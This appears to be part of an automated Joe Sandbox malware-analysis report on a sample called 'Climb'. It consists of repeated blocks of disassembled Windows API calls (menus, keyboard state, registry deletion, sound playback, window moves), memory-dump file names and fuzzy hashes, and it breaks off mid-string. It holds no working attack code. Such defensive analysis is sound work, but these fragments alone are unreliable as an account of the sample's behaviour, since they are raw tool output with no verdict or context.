                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                          • String ID: ThumbnailClass
                                                                                                                                                                          • API String ID: 1311036022-1241985126
                                                                                                                                                                          • Opcode ID: 0a7906548e9164512837823691d2b7a85e3ee9155a99ad2ebffd128d8b0ebad5
                                                                                                                                                                          • Instruction ID: 677bf5279ef2b787521e1a02c7aa692e2a52c543eaeb7f37cf47a637ac223180
                                                                                                                                                                          • Opcode Fuzzy Hash: 0a7906548e9164512837823691d2b7a85e3ee9155a99ad2ebffd128d8b0ebad5
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B91D471904A0AAFD708DF34C994FAAB7AAFF40340F01451DFA4686191EB31FD95CB91
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A624B0
                                                                                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AF97B6
                                                                                                                                                                          • GetFocus.USER32 ref: 00AF97C6
                                                                                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00AF97D1
                                                                                                                                                                          • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00AF9879
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00AF992B
                                                                                                                                                                          • GetMenuItemCount.USER32(?), ref: 00AF9948
                                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 00AF9958
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00AF998A
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00AF99CC
                                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AF99FD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 1026556194-4108050209
                                                                                                                                                                          • Opcode ID: 7b4d85a389db2be86b23accdfda1a4a4e407c9685bd2a32524a8597da51e75d1
                                                                                                                                                                          • Instruction ID: 03d82c921fc03fae48d00d7ddd11a1766aeae203837bd3689b673de2eb764fd6
                                                                                                                                                                          • Opcode Fuzzy Hash: 7b4d85a389db2be86b23accdfda1a4a4e407c9685bd2a32524a8597da51e75d1
                                                                                                                                                                          • Instruction Fuzzy Hash: 4081CD715083099FD711DFA5C884BBBBBE8FB89394F100A1DFA8597291DB70D905CBA2
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenuItemInfoW.USER32(00B329C0,000000FF,00000000,00000030), ref: 00ACC973
                                                                                                                                                                          • SetMenuItemInfoW.USER32(00B329C0,00000004,00000000,00000030), ref: 00ACC9A8
                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00ACC9BA
                                                                                                                                                                          • GetMenuItemCount.USER32(?), ref: 00ACCA00
                                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 00ACCA1D
                                                                                                                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00ACCA49
                                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 00ACCA90
                                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00ACCAD6
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ACCAEB
                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ACCB0C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 1460738036-4108050209
                                                                                                                                                                          • Opcode ID: 7e262132a58694f461e2587f3af433814b1d4da3fcc2dca008df97f3127f9597
                                                                                                                                                                          • Instruction ID: e30201ec6ea451966547a055c18d0223564ead8298cabc3655b9ed942ed0d334
                                                                                                                                                                          • Opcode Fuzzy Hash: 7e262132a58694f461e2587f3af433814b1d4da3fcc2dca008df97f3127f9597
                                                                                                                                                                          • Instruction Fuzzy Hash: FB61AE70900249AFDF11CFA8C989FFE7BBAFB053A8F150159E819A7251DB34AD05CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00ACE4D4
                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00ACE4FA
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00ACE504
                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 00ACE554
                                                                                                                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00ACE570
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                          • API String ID: 1939486746-1459072770
                                                                                                                                                                          • Opcode ID: 4317cf138163a49996c2078984f68f397e4908b589d4421e90b4b5b90a32113b
                                                                                                                                                                          • Instruction ID: 23403438839c559c680fa51bb87d8b8784415f67269a301172bf93cfeeeb2868
                                                                                                                                                                          • Opcode Fuzzy Hash: 4317cf138163a49996c2078984f68f397e4908b589d4421e90b4b5b90a32113b
                                                                                                                                                                          • Instruction Fuzzy Hash: 104136726002187BEB01FBB49E47FBF77ACEF55320F110069F900AA182FB749A0193A5
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00AED6C4
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00AED6ED
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00AED7A8
                                                                                                                                                                            • Part of subcall function 00AED694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00AED70A
                                                                                                                                                                            • Part of subcall function 00AED694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00AED71D
                                                                                                                                                                            • Part of subcall function 00AED694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AED72F
                                                                                                                                                                            • Part of subcall function 00AED694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00AED765
                                                                                                                                                                            • Part of subcall function 00AED694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00AED788
                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00AED753
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                          • API String ID: 2734957052-4033151799
                                                                                                                                                                          • Opcode ID: 2267139e742bf5d6d3590ffa1cfaca849f8e578f38f69283a5a56d731f5bf6a4
                                                                                                                                                                          • Instruction ID: 43eb2c40e081e173e3fa4b10a99bc8153783bbb42d753ff21228198102360c54
                                                                                                                                                                          • Opcode Fuzzy Hash: 2267139e742bf5d6d3590ffa1cfaca849f8e578f38f69283a5a56d731f5bf6a4
                                                                                                                                                                          • Instruction Fuzzy Hash: 99316D76A01129BBDB21DBD1DC88EFFBB7DEF46750F000165B806E6150DB349E46DAA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • timeGetTime.WINMM ref: 00ACEFCB
                                                                                                                                                                            • Part of subcall function 00A7F215: timeGetTime.WINMM(?,?,00ACEFEB), ref: 00A7F219
                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00ACEFF8
                                                                                                                                                                          • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00ACF01C
                                                                                                                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00ACF03E
                                                                                                                                                                          • SetActiveWindow.USER32 ref: 00ACF05D
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00ACF06B
                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00ACF08A
                                                                                                                                                                          • Sleep.KERNEL32(000000FA), ref: 00ACF095
                                                                                                                                                                          • IsWindow.USER32 ref: 00ACF0A1
                                                                                                                                                                          • EndDialog.USER32(00000000), ref: 00ACF0B2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                          • String ID: BUTTON
                                                                                                                                                                          • API String ID: 1194449130-3405671355
                                                                                                                                                                          • Opcode ID: 601376ef049632032f9ae7f4eff8366dc85902161196cd3006ff3c35572cba70
                                                                                                                                                                          • Instruction ID: 3c02e244dee13155b2aecfbbfbf684156c984c093c588d21f8804f66fe0c80f3
                                                                                                                                                                          • Opcode Fuzzy Hash: 601376ef049632032f9ae7f4eff8366dc85902161196cd3006ff3c35572cba70
                                                                                                                                                                          • Instruction Fuzzy Hash: 07219D71244604BFE712AFA0EC8AF3A7BABFB49F44B110028F50587272DF758C02CA61
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333
                                                                                                                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00ACF374
                                                                                                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00ACF38A
                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ACF39B
                                                                                                                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00ACF3AD
                                                                                                                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00ACF3BE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: SendString$_wcslen
                                                                                                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                          • API String ID: 2420728520-1007645807
                                                                                                                                                                          • Opcode ID: 75854e876d53e9357046bf82b1cec73aff98475d3a262fa07e1be85ced20c3dd
                                                                                                                                                                          • Instruction ID: 14484cffd4e6203b6550db5560bb79e610aa833192c46e47c7c60c0d2d0deafb
                                                                                                                                                                          • Opcode Fuzzy Hash: 75854e876d53e9357046bf82b1cec73aff98475d3a262fa07e1be85ced20c3dd
                                                                                                                                                                          • Instruction Fuzzy Hash: 59110631AD02687DD720B3A1DC0AFFF6ABCEBD2B40F0004697411E60E0DEA01D84C5B0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 00ACA9D9
                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 00ACAA44
                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00ACAA64
                                                                                                                                                                          • GetKeyState.USER32(000000A0), ref: 00ACAA7B
                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00ACAAAA
                                                                                                                                                                          • GetKeyState.USER32(000000A1), ref: 00ACAABB
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00ACAAE7
                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 00ACAAF5
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00ACAB1E
                                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 00ACAB2C
                                                                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00ACAB55
                                                                                                                                                                          • GetKeyState.USER32(0000005B), ref: 00ACAB63
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 541375521-0
                                                                                                                                                                          • Opcode ID: 436c065bfa2ccfc73ff819fd9039d32260af1eeddc2a8b6ea8ce882f166e18b4
                                                                                                                                                                          • Instruction ID: ba926226b9196ac4f65ab343c4d87dcc826d75f7c8f6e37cbb952d0ff4096854
                                                                                                                                                                          • Opcode Fuzzy Hash: 436c065bfa2ccfc73ff819fd9039d32260af1eeddc2a8b6ea8ce882f166e18b4
                                                                                                                                                                          • Instruction Fuzzy Hash: 6451E420A0478C29EB35D7A08951FFAAFF59F21388F0A859DC5C25A1C2DA649F4CC763
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00AC6649
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00AC6662
                                                                                                                                                                          • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00AC66C0
                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00AC66D0
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00AC66E2
                                                                                                                                                                          • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00AC6736
                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00AC6744
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00AC6756
                                                                                                                                                                          • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00AC6798
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00AC67AB
                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00AC67C1
                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00AC67CE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3096461208-0
                                                                                                                                                                          • Opcode ID: f2a3860a05915cf58938872ec72a9b6eed21cdd53e7f13b482cbed689722dfef
                                                                                                                                                                          • Instruction ID: 431261a0cc66c144a456de7b3cb1421a408fa2602d7419cfe792364eb9d90b66
                                                                                                                                                                          • Opcode Fuzzy Hash: f2a3860a05915cf58938872ec72a9b6eed21cdd53e7f13b482cbed689722dfef
                                                                                                                                                                          • Instruction Fuzzy Hash: D9510DB1A00205AFDF18CFA8DD89BAEBBB6FB48315F118529F919E7290D7709D05CB50
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A61802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A61488,?,00000000,?,?,?,?,00A6145A,00000000,?), ref: 00A61865
                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00A61521
                                                                                                                                                                          • KillTimer.USER32(00000000,?,?,?,?,00A6145A,00000000,?), ref: 00A615BB
                                                                                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00AA29B4
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00A6145A,00000000,?), ref: 00AA29E2
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00A6145A,00000000,?), ref: 00AA29F9
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00A6145A,00000000), ref: 00AA2A15
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00AA2A27
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 641708696-0
                                                                                                                                                                          • Opcode ID: a7b7c49de584378cc398515626d7c7df7c61cb45688a8ec2f837b37da3c3bfa4
                                                                                                                                                                          • Instruction ID: 29eac1e6328479e9e325a7619f3c17ca9d0c2413edc70c31d64f1927a99c308c
                                                                                                                                                                          • Opcode Fuzzy Hash: a7b7c49de584378cc398515626d7c7df7c61cb45688a8ec2f837b37da3c3bfa4
                                                                                                                                                                          • Instruction Fuzzy Hash: 39615E31501711DFDB36DF58D948B3ABBB2FB81312F288529E443976B0CB75A891DB81
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A62234: GetWindowLongW.USER32(?,000000EB), ref: 00A62242
                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00A62152
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ColorLongWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 259745315-0
                                                                                                                                                                          • Opcode ID: 05ab543e89b0ccba6e885e68577599d7bcca0884e3a8672a41c9a1468700ab96
                                                                                                                                                                          • Instruction ID: 552126fbe35cb04522ca7a71909522c34431c5548281073e72e5404704681ad2
                                                                                                                                                                          • Opcode Fuzzy Hash: 05ab543e89b0ccba6e885e68577599d7bcca0884e3a8672a41c9a1468700ab96
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C41B471104A40AFDF219FB89C48BBA3B76AB47331F154359FAA68B2E1C7319D42DB10
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00AB0D31,00000001,0000138C,00000001,00000000,00000001,?,00ADEEAE,00B32430), ref: 00ACA091
                                                                                                                                                                          • LoadStringW.USER32(00000000,?,00AB0D31,00000001), ref: 00ACA09A
                                                                                                                                                                            • Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00AB0D31,00000001,0000138C,00000001,00000000,00000001,?,00ADEEAE,00B32430,?), ref: 00ACA0BC
                                                                                                                                                                          • LoadStringW.USER32(00000000,?,00AB0D31,00000001), ref: 00ACA0BF
                                                                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00ACA1E0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
